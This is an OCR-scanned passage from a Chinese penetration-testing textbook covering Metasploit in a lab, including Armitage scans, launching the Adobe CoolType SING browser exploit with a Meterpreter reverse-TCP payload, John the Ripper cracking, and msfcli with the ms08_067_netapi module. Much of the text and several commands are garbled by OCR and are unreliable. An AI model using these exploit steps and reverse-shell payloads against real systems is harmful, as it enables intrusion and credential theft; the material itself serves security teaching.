(4) 在 该 界面 选择 Metasploitable.vmx， 然 后 单 击 “ 打 开 " 按 钮 ， 将 显示 如 图 6.2 所 示 
的 界面 。 





g Metasplortable2-Linux - VMware Workstation 
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-— (SCSI) 8 GB 
jCD/DVD (DE) 自动 检测 

T3) est NAT 
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USB PWH 存在 





2I 自动 检测 
v fü 
This is Metasplonable? (Linux) = 虚拟 机 详细 信息 


EE CX 
RER: I:\Metasplortable2-Linux\Metasploitable.vmx 
BABS: Workstation 6.5-7.x ÆRU, 


Metasplortable is an intentionally 
vulnerable Linux virtual machine. This 
VM can be used to conduct securty 





图 6.2 安装 的 Metasploitable 系 统 


(5) O——— | 启动 Metasploitable 系 统 。 


6.2 Metasploit z} 


Metasploitz& — zA JT 3m B zc 438545 LER. e AREA IRE, Kit 
pieds 并 对 菜 些 软件 进行 安全 性 评估 ， 提供 真正 的 安全 风险 情报 。 当 用 

一 次 接触 Metasploit 滩 透 测试 框架 软件 (MSF) 时 ， 可 能 会 被 它 提供 如 此 多 的 
en, 选项 、 变 量 和 模块 所 震撼 ， 而 感觉 无 所 适 从 。 Metasploit 软 件 为 它 的 基础 功 
能 STA 户 接口 ， 包 括 终 端 、 命 信行 和 图 形 化 界面 等 。 本 节 将 介绍 
Metasploit 下 各 种 接口 的 使 用 方法 。 


6.2.1 Metasploit 的 图 形 管理 工具 Armitage 


Armitage 组 件 是 Metasploit 框 架 中 一 个 完全 交互 式 的 图 形 化 用 户 接口 ， 由 Raphael 
Mudge 所 开发 。Armitage 工 具 包 含 Metasploit 控 制 台 ， 通 过 使 用 其 标签 特性 ， 用 户 
可 以 看 到 多 个 Metasploit 控 制 台 或 多 个 Meterpreter 会 活 。 


使 用 Armitage 工 具 。 上 有 具体 操作 步骤 如 下 所 示 。 


(1) 和 启动 Metasploit 服 务 。 在 使 用 Armitage 工 具 前 ， 必 须 将 Metasploit 服 务 启动 。 
否则 ， 无 法 运 行 Armitage 工 具 。 因 为 Armitage 需 要 连接 到 Metasploit 服 务 ， 才 可 以 

启动 。 在 Kali 时 面 依次 选择 “应 用 程序 ”|Kali Linux "系统 服 

务 ”|Metasploitlcommunity/pro start 谷 全 启动 Metasploit 服 务 ， 将 输出 如 下 所 示 的 信 

eS. 


AUN =" 


[ ok ] Starting PostgreSQL 9.1 database server: main. 

Configuring Metasploit.. 

Creating metasploit database user 'msf3'.. 

Creating metasploit database 'msf3'.. 

insserv: warning: current start runlevel(s) (empty) of script met: 
insserv: warning: current stop runlevel(s) (012 34 5 6) of scril| 


Z —— 
从 输出 的 信息 中 可 以 看 到 PostgreSQL 9.1 效 据 库 服 务 已 启动 ， 并 创建 了 数据 库 用 户 
和 数据 库 。 


(2) 启动 Armitage 工 具 。 在 Kali 虹 面 依次 选择 “应 用 程序 ”|Kali Linux| 漏洞 利用 工具 
集 ”| 网 络 漏洞 利用 ”|larmitage 命 合 ， 如 图 6.3 所 示 。 或 者 在 终端 运行 armitage 命 合 启 
动 Armitage 工 具 ， 如 下 所 示 : 





root@kali:~# armitage 


应 用 程序 UN 


Kili Lorine 
| 天 办 公 
f mh 
H 电子 
E ne 
@ 互联 网 
(3 ui ibis] 
AA mn 





El BeEF X55 Fr j 

^ Ej Cicoli it J 
ie | 有 ^ Kl Exploit Database . 

FRERE » ! Ua Ti E c Exploit Development Tools # 

" n ' At [Ty , tà Metasploit : 

— H E à HETE Har kry ' ci Social Ernegineenng Toolkit 

à np REI 









LINUR 


图 6.3 和 启动 armitage 界 面 
(3) 启动 armitage 工 具 后 ， 将 显示 如 图 6.4 所 示 的 界面 。 














Connect... 


Host 127.0.0.1 


Port 55553 


User msf 





Pass ttt? 


| Connect | | Help | k 


6.4 连接 Metasploit 界 面 


(4) 在 该 界面 显示 了 连接 Metasploit 服 务 的 基本 信息 。 在 该 界面 单 击 Connect 按 
钮 ， 料 显示 如 图 6.5 所 示 的 界面 。 








Start Metasploit? ii ol 





A Metasploit RPC server is not running or 
not accepting connections yet. Would you 
like me to start Metasploit's RPC server 
for you? 








6.5 Metasploit 


(5) 该 界面 提示 是 否 要 和 启动 Metasploit 的 RPC 服 务 。 单 击 “ 是 (Y)” 按 钮 ， 将 显示 如 图 
6.6 所 示 的 界面 。 


进度 .… Ae 


Connecting to 127.0.0.1:55553 
java.net.ConnectException: Te18i Hs 


1 











6.6 连接 Metasploit 界 面 


(6) 该 界面 显示 了 连接 Metasploit 的 一 个 进度 。 当 成 功 连接 到 Metasploit 服 务 的 
话 ， 将 显示 如 图 6.7 所 示 的 界面 。 





DO NAtanagrninitH +), DAQ 
Lm, f n 7 LTA Cs V» L 7) J | A 
6.2 Metas D lolt 基 础 216 





Armitage 
Armitage View Hosts Attacks Workspaces Help 
> (ii auxiliary 


> (ijj exploit 
> | 大 payload 


> (Bi post A 





A we 


| Console X | | 











6.7 Armitage 初 始 界面 


(7) 该 界面 共有 三 个 部 分 ， 这 里 把 它们 分 别 标记 为 A、B 和 C。 下 面 分 别 介 绍 这 三 
部 分 。 
oA: 这 部 分 显示 的 是 预 配置 模块 。 用 户 可 以 在 模块 列表 中 使 用 空格 键 搜索 提供 


的 模块 。 
eee ee geri Lie 
e C : 这 部 分 显示 多 个 Metasploit 标 签 。 这 样 ， 束 可 以 运行 多 个 Meterpreter 命 倒 


或 控制 台 会; ， 并 且 同 时 显示 。 
【实例 6-1】 演示 使 用 Armitage 工 具 做 渗透 测试 。 具 体操 作 步 骤 如 下 所 示 。 


(1) £ sto mn FAHMA6.7Aim. MRAMA INRA 11820ff£ 
何 主机 。 过 扫 摘 ， 找 到 本 网 络 中 的 所 有 主机 。 


(2) RAR Scan|Quick Scan 命令， 将 
显示 如 图 6.8 所 示 的 界面 。 























输入 


Enter scan range (e.g... 192.168.1.0/ 24): 





| 102 168.41.0/24 


— ——— — 











图 6.8 4 Ada ese E] 


(3) 在 该 界面 输入 要 打 摘 的 网 络 沁 围 ， 这 里 输入 的 网 络 沁 围 是 192.168.41.0/24。 
然后 单 击 “ 确 定 ” 按 钮 ， 将 开始 打 描 。 扫 摘 完 成 后 ， 将 显示 如 图 6.9 所 示 的 界面 。 


Arnmuüape View Hosts Alləcks Workspaces Help 





+ Mg auxiliary 


E = e pleut à 
» [BE payload : 
* [ij post 


192.168.41.1 192.1668.41.2 192.168.41.146 





Scan Complete’ 


= m 


| Console X | nmap X | 


MILTIUE MU Address: 00:0C:29:83:AC:B0 (\ 


Use Attaché >Find Attacks bo Suggest 
applicable exploits for your Largets 









*] Nmap: Nmap scan report for 192.168.41.9 

*] Nmap: Host is up (0.000585 latency). | Wi | 
*] Nmap: All 100 scanned ports on 192.168.4 

[*) Nmap: MAC Address: 00:00:29:72:B83:35 (VMware) 

iil Nmap: Nmap scan report for 192.168.471.254 

[*] Nmap: Host is up (0.000145 latency). 

*] Nmap: All 100 scanned ports on 192.168.41.254 are filtered 





*] Nmap: MAC Address: 00:50:56:F3:FF:64 (VMware) 


Pe ee 


I*] Nmap 
Li Nmap 
*] Nmap: All 100 scanned ports on 192.168.41.235 are closed 


图 6.9 扫描 结果 


(4) 从 该 界面 可 以 看 到 ， 漳 出 了 一 个 扫 拉 完成 对 话 框 ， 此 时 单 击 “ 确 定 "按钮 即 可 。 
并 且 在 目标 系统 的 窗口 中 ， 显 示 了 三 台 主 机 。 这 三 台 主 机 融 是 扫 摘 到 的 主机 。 从 扫 
拍 完 成 的 对 话 框 中 可 以 看 到 提示 建议 选择 Attacks|Find Attacks 命 分 ， 将 可 以 渗透 攻 
i Hd 


(5) 在 菜单 栏 中 依次 选择 Attacks|Find Attacks 命 仿 ， 运 行 完 后 将 显示 如 图 6.10 所 
示 的 界面 。 


消息 


Attack Analysis Complete... 


You will now see an 'Attack' menu attached 
to each host in the Targets window. 


Happy hunting! 





图 6.10 消息 


(6) 从 该 界面 可 以 看 到 攻击 分 析 完 成 ， 并 且 右 击 扫 摘 到 的 主机 将 会 看 到 有 一 个 
Attack 荣 单 ， 如 图 6.11 所 示 。 


Armitage 


Armalage View Hosts Allacks Workspaces Help 


» E auxiliary 
> PF exploit 





= lj payload 
e lj post 








l Console X | nmap X | 


| Nmap: Host is up (0.000595 dE 
| Nmap: All 100 scanned ports on 

€T Nmap: MAC Address: 00: DL TERR CD (VMware) 
] Nmap: Nmap scan report for 192.168.41.170 
] Nmap: Host is up (0.00058s latency). 






L z EXE a aciwecolan_ chat 
agn Pres i : 
| lemserver F | ajaxplorer checkinstall exec 
Seryices samba » z d 
$ i apprain upload exec 
Gran : 
- sharp E 

| webapp auxiliurm, upload soc 

Host "| wry Se p contentkeeperweb mimencode 








culeflow_upload_exec 


extplorer upload exec 









[amilyerns less exec 
168.41.156 are closed freanas Exec. raw 
ptonous graph 


More 


| Nmap: All 100 scanned ports on 192.168.41.1/0 are closed 


Nmap: MAC Address: 
Nmap: Nmap scan report for 
] Nmap: Host is up (0.0001 4s 


00:0C:29:72:B83:35 (VMware) 
192.168.411.254 
latency). 


*] Nmap: All 100 scanned ports on 192.168.41.254 are filtered 


| Nmap: MAC Address: 00:50:56:F3:FF:64 (VMware) 
192.168.471.235 
Nmap: Host is up (0.00000405 STEH 


"| Nmap: Nmap scan report for 


Nmap: All 100 scanned ports on 1 


168,47.235 are closed 


Nmap done: 256 IPF addresses (7 hosts up) scanned in 4.08 seconds 


图 6.11 Attack 菜 单 


(7) 从 该 界面 可 以 看 到 在 目标 主机 的 菜 


单 中 出 现 了 Attack 选 项 












= 
i, 
P 





在 该 菜单 中 共有 五 


个 选项 。 在 没有 运行 Find Attacks 命 令 前 ， 只 要 Services、 Scan 和 Host 三 个 选项 


这 里 扫 摘 到 的 主机 屏 才 都 是 黑色 ， 这 是 因为 还 没 


识别 出 操作 系统 的 类 型 。 此 时 可 


以 在 菜单 栏 中 依次 选择 Hosts|Nmap Scan|Quick Scan (OS detect) MA, 4401F 
作 系 统 类 型 。 扫 拍 完 成 后 ， 将 显示 操作 系统 的 软 认 图 标 。 


(8) 扫 朱 操作 系统 。 扫 挡 完 成 后 ， 将 显 


示 如 图 6.12 所 示 的 界面 。 


Armitage 
Arrmutage View Hosts Attacks Workspaces Help 


» li auxiliary 

| 
* [li payload "| 
+ | post i 


cHNNEM— 
ae 
: 
E. Ln 


—_ 
Ez 


192.168.41.1 192.168.41.2 192.168.41.146 





| Console X I nmap X | nmap Xx | nmap X “nmap X 
[*] Nmap: 5000/tcp open http-proxy sslstrip 

Nmap: MAC Address: 00:00:29:48:66:40 (VMware) 
[*] Nmap: Device type: general purpose 
[*] Nmap: Running: Microsoft Windows 2000|XP 

Nmap: OS CPE: cpe:/o:microsoft:windows_2000::- cpe:/o:microsoft:windows_2000::sp1 
cpe:/o:microsoft:windows 2000::sp2 cpe:/o:microsoft:windows 2000::sp3 
cpe:/o:microsoit:windows_Z000::sp4 cpe:/o:microsoit:windows xp::- 
cpe:/o:microsoft:windows xp::sp1 
[*] Nmap: OS details: Microsoft Windows 2000 SPO = SP4 or Windows XP SPO = SP" 
[*) Nmap: Network Distance: 1 hop 


[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 


Nmap: O$ and Service detection performed. Please report any incorrect results at 
http: //nmap.org/submit/ . 


| 


[*) Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.71 seconds 





msi > 


图 6.12 打 描 的 操作 系统 


(9) 从 该 界面 可 以 看 到 打 括 到 的 目标 主机 ， 屏 幕 发 生 了 变化 。 此 时 束 可 以 选择 目 
标 ， HTS BENE. 


(10) JEN, SAEM ER A OARDEN HARRA, MR DEN 
浏览 器 模块 。 在 预 配置 模块 中 依次 选择 
exploitlwindows|browserladobe_cooltype_sing 模 块 ， 双 击 adobe_cooltype_sing 模 
块 ， 将 显示 如 图 6.13 所 示 的 界面 。 





windows/browser/adobe_cooltype_sing X 


Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow 


This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 
8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well, 





| üption à| Value 
DisablePayloadHandler false 
ExitOnSession false 
LHOST 192.168.41.235 
LPORT 8107 
PAYLOAD + windows! meter preter/reverse_icp 
SRVHOST 0.0.0.0 
SRVPORT BOSD 
SSL ü 
SSLCert 
SSL Version SSL3 

| URIPATH 


Targets |Ù => Automatic |* 





LJ Show advanced options 


| Launch | 











16.13 模块 配置 选项 


(11) 该 界面 显示 了 adobe cooltype _sing 模 块 的 默认 配置 选项 信息 。 这 些 选 项 的 
默认 值 ， 可 以 通过 双击 黑 认 值 修 改 。 设 置 完 成 后 ， 单 击 Launch 按 钮 ， 在 Armitage 窗 
口 将 显示 如 图 6.14 所 示 的 界面 。 


Armitage 
Armitage View Hosts Attacks Workspaces Help 


b mi backupexec 由 
» | 大 brightstor | 


Y lag browser 





adobe flash | 
adobe rash ol 


192.168.41.2 192.168.41.146 





Console X | nmi windows/browser/adobe cooltype sing X 


msf expl pitts | ] > set PAYLOAD windows/mete rprete r/reverse tep 

PAYLOAD => windows/meterpreter/reverse tcp 

msi exploit{ j= set TARGET Ü 

TARGET => 0 

ms! exploit ] > set SRVHOST 0.0.0.0 

SRVHOST => 0.0.0.0 

msi exploit{ j] > set ExitOnSession Talse 

ExitOnSession => false 

ms! exploit )> exploit -j 

[*) Exploit running as background job. 

[| Started reverse handler on 192.168.41.235:8684 

[*) Using URL: http: //0.0.0.0:B080//EdBZoma/AEGYV/G 

| Local IP: http: //192.168.41.235:8080//EdB2oma/AEGV/G 
Server started. 





mst exploit ) > 


46.14 渗透 攻击 结 


(12) 从 该 界面 可 以 看 到 ， 使 用 adobe cooltype_sing 模 块 渗透 攻击 的 过 程 。 从 最 
后 的 信息 中 可 以 看 到 ， 渗 透 攻 击 成 功 运 行 。 以 后 某 从 主机 访问 
http://192.168.41.235:8080/JEdB2oma7AEGV7G 链 接 时 ， 将 会 在 目标 主机 上 创建 
一 个 名 为 JEdB2oma7AEGV7G 的 PDF 文件 。 只 要 有 目标 主机 访问 该 链接 ， 
Armitage 控 制 台 会 话 中 将 会 显示 访问 的 主机 ， 如 图 6.15 所 示 。 


Armitage 


Armitage View Hosts Attacks. Workspaces Help 


[a te 
- 
E> 





adobe flash rie 192.168.41.1 192.168.41.2 192.168.41.146 





| Console X | nmap X | windows browser/adobe_cooltype sing X | 


mst exploit! j| > set ExitOnSession false 
ExitOnSession => false 
msi exploit IS exploit 4 
[*] Exploit running as background job. 
[*] Started reverse handler on 192.168.41.235°8684 
[*] Using URL: Attp://0.0.0,0°;8080//EdBZoma/sAEGV/G 
[*] Local IP: http://192.168.41,.235:8080//EdB2Zoma/AEGV/G 
[*] Server started. 
[*] 192.168.417.146 adobe_cooltype_sing - Request from browser: Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1] 
146 adobe cooltype sing - Sending crafted PDF 
8.411.146 adobe cooltype sing - Request from browser: Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.17 - 
168.41. adobe cooltype_ sing = Sending crafted PDF 





mst ex eum ‘ooltype | Ed 


图 6.15 攻击 信息 


(13) 从 该 界面 可 以 看 到 主机 192.168.41.146， 访 问 了 
http://192.168.41.235:8080/JEdB2oma7AEGV7G 链 接 。 并 且 ， 可 以 看 到 在 主机 
192.168.41.146 上 创建 了 PDF 文 件 。 


6.2.2 控制 Metasploit 终 端 (MSFCONSOLE) 


MSF 终端 (MSFCONSOLE) 是 目前 Metasploit 框 染 最 为 流行 的 用 户 接 口 ， 而 且 也 
是 非常 灵活 的 。 因 为 MSF 终 端 是 Metasploit 框 架 中 最 灵活 、 功 能 最 丰富 及 支持 最 好 
的 工具 之 一 。 MSFCONSOLE 主 要 用 于 管理 Metasploit 数 据 库 ， 管理 会 话 、 配 置 并 
启动 Metasploit 模 块 。 本 质 上 来 说 ， aec adi Lin paese rie & HX FH 
户 连接 到 主机 的 信息 ， 以 至 于 用 户 能 启动 渗透 攻击 目标 系统 。 本 小 节 将 介 
Metasploit: im (MSFCONSOLE) 。 


x ($ HĦ Metasploit tl Sat, FA PRM AE ete, SRAM. 


help : 该 命令 允许 用 户 查看 执行 命令 的 帮助 信息 。 

use module : 该 命令 允许 用 PMR BEBE 

set optionname module : 该 命令 允许 用 户 为 模块 设置 不 同 的 选项 。 
run : 该 命令 用 来 启动 一 个 非 渗 透 攻 击 模块 。 

search module : 该 命令 允许 用 户 搜索 一 个 特定 的 模块 。 

exit : 该 命令 人 允许 用 户 退 出 MSFCONSOLE。 


MSFCONSOLE 漏 洞 利用 的 具体 操作 步骤 如 下 所 示 。 
(1) 在 终端 启动 MSFCONSOLE， 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


"E 5((—À 十 
| METASPLOIT by Rapid? | 
AlILIIIIIIIIIIIIIIlIllIlllIlllllIlll4----l-lIllllIlIllIllllll-l-l--4 

up UT M | 
| omnei ede (paai E ELS] 

| jA ||] EXPLOIT | | 

| Il V [SECURE 二 | 

| ll | |==[msf >]============ 

| li M | Yen] 

| I! RECON V | Y@K@X@NG@X@XG@H@V | 
| fi NW | tec o | 

二 === --+ 

| oOo | VY | 

| 00 | ======( | 

| o | ' LOOT + | 

| |AAAAAAAAAAAAAE | i BIS | 

| | PAYLOAD I] / ain | | 
J se a Wed ff | _ | | | 

IIo mee" | B | 

| SSE ee | cImImIÍlmIIL zl | 
X RE EE =+ 


Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro's wizard -- type 'go pro' to launch it now. 
=[ metasploit v4.8.2-2014010101 [core:4.8 api:1.0] 
+ -- --z[ 1256 exploits - 762 auxiliary - 212 post 
+ -- --=[ 324 payloads - 32 encoders - 8 nops 
msf > 


输出 的 信息 出 现 msf> 提 示 符 ， 表 示 登 录 MSFCONSOLE 成 功 。 此 时 就 可 以 在 该 命 倒 
行 运行 其 他 任何 命令 。 
(2) 使 用 search 命 令 搜 索 所 有 有 效 的 Linux 模 块 。 对 于 模块 用 户 每 次 想 要 执行 一 个 


动作 ， 这 是 一 个 很 好 的 主意 。 主 要 原因 是 Metasploit 各 种 版 本 之 间 ， 模 块 的 路 径 可 
能 有 改变 。 执 行 命 全 如 下 所 示 : 


msf> search Linux 


Matching Modules 


Name Disclosure Date Rank Description 


Remote Command Execution 
auxiliary/analyze/jtr linux 
Linux Password Cracker 
auxiliary/analyze/jtr unshadow 
Utility 
auxiliary/dos/wifi/netgear ma521 rates normal NetGear MA521 
Wireless Driver Long Rates Overflow 
auxiliary/dos/wifilnetgear wg311pci 
Wireless Driver Long SSID Overflow 


normal John the Ripper 


normal Unix Unshadow 


nomal NetGear WG311v1 


auxiliary/scanner/http/atlassian crowd fileaccess normal Atlassian Crowd 
XML Entity Expansion Remote File Access 

auxiliary/scanner/http/hp sitescope getfileinternal fileaccess normal HP SiteScope 
SOAP Call getFilelnternal Remote File Access 

auxiliary/scanner/http/hp sitescope getsitescopeconfiguration normal HP SiteScope 
SOAP Call getSiteScopeConfiguration Configuration Access 

auxiliary/scanner/http/hp sitescope loadfilecontent fileaccess normal HP SiteScope 
SOAP Call loadFileContent Remote File Access 
oe RES ALS 

post/multi/lmanage/play youtube normal Multi Manage YouTube Broadcast 

post/multilmanage/record mic normal Multi Manage Record Microphone 

post/multi/manage/sudo normal Multiple Linux / Unix Post Sudo Upgrade Shell 


post/multi/manage/system_session normal Multi Manage System Remote TCP Shell 
Session 


post/pro/multi/agent normal Metasploit Pro Persistent Agent 
post/pro/multi/agent_cleaner normal Metasploit Pro Persistent Agent Cleaner 
posUpro/mult//gather/hashdump normal Pro: Multi Gather Hashdump 
post/pro/multi/gather/sysinfo normal Unix Gather System Info 


post/pro/multi/macro normal Metasploit Pro Post Exploitation Macro Launcher 
post/windows/manage/pxexploit normal Windows Manage PAE Exploit Server 


ia HAE Site Metasploit FATA AMAR. igHBgMSERBYm^A9U, DIRTI 
块 名 称 、 公 开 时 间 、 等 级 及 摘 述 。 以 上 输出 的 内 容 较 多 ， 但 是 由 于 篇 幅 的 原因 ， 这 
里 只 列 出 了 一 少 部 分 内 容 ， 省 略 的 内 容 使 用 省 略 号 (C... ) RB. 


(3) 使 用 John Ripper linux 密 码 破 解 模块 。 执 行 命 全 如 下 所 示 : 


msf > use auxiliary/analyze/jtr linux 
msf auxiliary(jtr linux) » 


输出 的 信息 表示 已 加 载 jtr_linux 模 块 。 
(4) BRAN ARLE. tT BA RATT : 


msf auxiliary(jtr_linux) > show options 
Module options (auxiliary/analyze/jtr_linux): 


Name Current Setting Required Description 

Crypt false no Try erypt() format hashes(Very Slow) 

JOHN BASE no The directory containing John the Ripper (src, 
run, doc) 

JOHN PATH no The absolute path to the John the Ripper 
executable 

Munge false no Munge the Wordlist (Slower) 

Wordlist no The path to an optional Wordlist 


msf auxiliary(jtr linux) > 


从 输出 结果 中 可 以 看 到 jtr_linux 模 块 有 5 个 有 效 的 选项 ， 如 Crypt、JOHN BASE、 
JOHE_PATH、Munge 和 Wordlist。 在 输出 的 信息 中 ， 对 这 5 个 选项 分 别 有 详 细 的 插 


(5) 现在 用 户 有 一 个 选项 的 列表 ， 这 些 选项 为 运行 jtr_linux 模 块 。 用 户 能 设置 独特 
的 选项 ， 使 用 Set 命令。 设置 JOHN_PATH 选 项 ， 如 下 所 示 : 


msf auxiliary(jtr linux) > set JOHN PATH /usr/share/metasploit- fr: 
JOHN PATH => /usr/share/metasploit-framework/data/john/wordlists/ | 


(6) 现在 运行 渗透 攻击 ， 执 行 命 分 如 下 所 示 : 





msf auxiliary(jtr_linux) > exploit 


6.2.3 控制 Metasploit 命 邻 行 接 口 (MSFCLI 


本 小 节 将 介绍 Metasploit 命 令 行 接口 (MSFCLI) 。 为 了 完成 Metasploit 的 攻击 任 
， 需 要 使 用 一 个 接口 。MSFCLI 刚 好 实现 这 个 功能 。 为 了 学 习 Metasploit 或 测试 / 
写 一 个 新 的 渗透 攻击 ，MSFCLI 是 一 个 很 好 的 接口 。 


MSF 命 分行 和 MSF 终 靖 为 Metasploit 框 以 访问 提供 了 两 种 截然 不 同 的 途径 ，MSF 终 
靖 以 一 种 用 户 友 好 的 模式 来 提供 交互 方式 ， 用 于 访问 软件 所 有 的 功能 特性 ， 而 
MSFCLI 则 主要 考虑 脚本 义理 和 和 与 其 他 命令 行 工 具 的 互 操 作 性 。MSFCLI 背 用 的 命 全 
如 下 所 示 。 


e msfcli : 加 载 所 有 有 效 渗透 攻击 MSFCLI 的 列表 。 
e msfcli -h : 查看 MSFCLI 帮 助 文档 。 
e msfcli [PATH TO EXPLOIT] [options = value] : 启动 渗透 攻击 的 语法 。 


MSF 命令 行 MSFCLI 的 使 用 如 下 所 示 。 


(1) 和 启动 MSF 命令 行 (MSFCLD 。 和 启动 的 过 程 需要 一 点 时 间 ， 请 耐心 等 符 ， 这 取 
决 于 用 户 系 统 的 速度 。 还 要 注意 ， 随 着 MSFCLI 负 载 ， 可 利用 的 有 效 列 表 将 显示 出 
来 。 执行 命令 如 下 所 示 : 


root@kali:~# msfcli 
[*] Please wait while we load the module tree... 


(2) 查看 MSFCLI 帮 助 文 档 。 执 行 命 分 如 下 所 示 : 


root@kali:~# msfcli -h 


Usage: /opt/metasploit/apps/pro/msf3/msfcli «exploit name- <option=value> [mode] 


-— c— c— — oc—  — c —  — E — c — — c — c — ee c — uu m -— c—  — —  —  — c—  — c —  — — T -—— — — — i — =a a 三 三 ——< — — NEL GEM. EM GUNL GENS 二 二 


Mode POCO 

(A)dvanced Show available advanced options for this module 

(AC)tions Show available actions for this auxiliary module 

(C)heck Run the check routine of the selected module 

(E)xecute Execute the selected module 

(H)elp You're looking at it baby! 

(NDS Evasion Show available ids evasion options for this module 

(O)ptions Show available options for this module 

(Pjayloads Show available payloads for this module 

(Summary Show information about this module 

(T)argets Show available targets for this exploit module 
Examples: 


msfcli multi/handler payload-windows/meterpreter/reverse tcp IhostzIP E 
msfcli auxiliary/scanner/http/http version rhosts-IP encoder-post- nop- E 


以 上 输出 的 信息 显示 了 msfcli 命 全 的 帮助 文档 。 通 过 查看 这 些 
一 个 模块 的 使 用 说 明和 使 用 模式 列表 。 


(3) 为 了 证 明 前 面 所 说 的 帮助 文档 信息 。 这 
项 。 执 行 命 分 如 下 所 示 : 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas A 
[*] Initializing modules... 


ABANI, PILA T AR 


显示 模块 的 高 级 选 


以 上 信息 显示 了 xmas 模 块 的 高 级 选 
括 名 称 、 


当前; 


Name : GATEWAY 

Current Setting: 

Description : The gateway IP address. This will be used rather than a random remote 
address for the UDP probe, if set. 

Name : NETMASK 

Current Setting  : 24 

Description : The local network mask. This is used to decide if an address is in the local 
network. 

Name : ShowProgress 

Current Setting : true 

Description : Display progress messages during a scan 

Name : ShowProgressPercent 

Current Setting : 10 

Description : The interval in percent that progress should be shown 

Name : UDP. SECRET 

Current Setting : 1297303091 

Description : The 32-bit cookie for UDP probe requests. 

Name : VERBOSE 

Current Setting : false 

Description : Enable detailed status messages 

Name : WORKSPACE 

Current Setting  : 

Description : Specify the workspace for this module 


会 出 信息 中 对 每 个 i 选项 部 有 3 部 分 介绍 ， 包 


项 。 
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(4) 此 外 ， 用 户 可 以 使 用 S 模 式 列 出 当前 模块 的 一 个 摘要 信息 。 这 个 摘要 模式 是 查 
看 所 有 有 效 选项 的 一 个 很 好 的 方法 。 大 部 分 选项 是 可 选 的 。 但 是 为 了 使 用 户 设 i H 
IRAR MmMO, ARAE ANEA. 启动 摘要 模式 渗透 攻击 ， 执 行 命 分 如 下 所 
/小 - 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas S 
[*] Initializing modules... 

Name : TCP "XMas" Port Scanner 

Module : auxiliary/scanner/portscan/xmas 
License : Metasploit Framework License (BSD) 

Rank : Normal 

Provided by: 
kris katterjohn <katterjohn@gqmail.com> 

Basic options: 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to scan per set 

INTERFACE no The name of the interface 

PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) 

RHOSTS yes The target address range or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to capture 

THREADS 1 yes The number of concurrent threads 

TIMEOUT 500 yes The reply read timeout in milliseconds 
Description: 


Enumerate open|[fillered TCP services using a raw "XMas" scan; this sends probes containing 
the FIN, PSH and URG flags. 


以 上 信息 为 xmas 模 块 的 摘要 信息 。 E" 包括 xmas 模 块 的 名 称 、 位 置 、 许 可 
证 、 级 别 、 提 供 丙 、 基 本 选 Lad: 


(5) ABM $38 XC BLA WIR, 可 以 使 用 O 模 式 。 该 模式 是 用 来 配置 渗透 攻 
击 模块 的 ， 每 个 渗透 攻击 模块 有 一 套 不 同 的 设置 选项 ， 也 可 能 没有 。 所 有 必须 的 选 
RES 参透 攻击 允许 执行 之 前 ; 受 置 。 从 下 面 的 输出 信息 中 ， 可 以 看 到 许多 必 须 的 

选项 办 认 已 设置 。 如 果 是 这 样 ， 融 不 需要 更 新 这 些 选 项 值 了 ， 除 非 用 户 想 要 修改 
c. 执行 命 分 如 下 所 示 : 


rooti@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas O 
[*] Initializing modules... 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to scan per set 
INTERFACE no The name of the interface 

PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) 
RHOSTS yes The target address range or CIDR identifier 
SNAPLEN 65535 yes The number of bytes to capture 

THREADS 1 yes The number of concurrent threads 
TIMEOUT 500 yes The reply read timeout in milliseconds 


输出 的 信息 显示 了 xmas 模 块 需要 的 配置 选项 ， 如 BATCHSIZE、PORTS、 
SNAPLEN、 


(6) 用 户 可 以 使 用 E 模 式 运 行 渗透 攻击 测试 。 执 行 命 分 如 下 所 示 : 


root@kali:/usr/bin# msfcli auxiliary/scanner/portscan/xmas E 


【实例 6-2】 (8 FAAMSFCLIBMIS BAKE, x E EAmsO8 067_netapi 模 块 为 例 。 具 体 
操作 步骤 如 下 所 示 。 


(1) 查看 ms08_067_netapi 模 块 的 配置 参数 选项 。 执 行 命 全 如 下 所 示 : 


root@kali:~# msfcli windows/smb/ms08 067 netapi O 
[*] Initializing modules... 


Name Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes Set the SMB service port 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


从 输出 的 信息 中 可 以 看 到 该 模块 有 三 个 配置 选项 ， 分 别 是 RHOST、RPORT 和 
SMBPIPE. 


(2) 查看 ms08 067_netapi 模 块 中 可 用 的 攻击 载 何 。 执 行 命 令 如 下 所 示 : 


root@kali:~# msfcli windows/smb/ms08 067 netapi RHOST=192.168.41.169 P 


[*] Initializing modules... 
Compatible payloads 


Name 
generic/custom 
PAYLOADFILE or PAYLOADSTR. 
generic/debug trap 
generic/shell bind tcp 
shell 
generic/shell reverse tcp 
shell 
generic/tight loop 
windows/dllinjecU/bind ipv6 tcp 
a reflective loader 
windows/dllinject/bind nonx tcp 
reflective loader 
windows/dllinject/bind tcp 
reflective loader 
windows/dllinject/reverse http 
via a reflective loader 
windows/dllinject/reverse ipv6 http 
a DLL via a reflective loader 
windows/dllinject/reverse ipv6 tcp 
DLL via a reflective loader 
windows/dllinjectreverse nonx tcp 
DLL via a reflective loader 
windows/dllinject/reverse ord tcp 
reflective loader 
windows/dllinject/reverse tcp 
reflective loader 


windows/dllinject/reverse tcp allports 


Description 


Use custom string or file as payload. Set either 


Generate a debug trap in the target process 
Listen for a connection and spawn a command 


Connect back to attacker and spawn a command 


Generate a tight loop in the target process 
Listen for a connection over IPv6, Inject a DLL via 


Listen for a connection (No NX), Inject a DLL via a 
Listen for a connection, Inject a DLL via a 
Tunnel communication over HTTP, Inject a DLL 
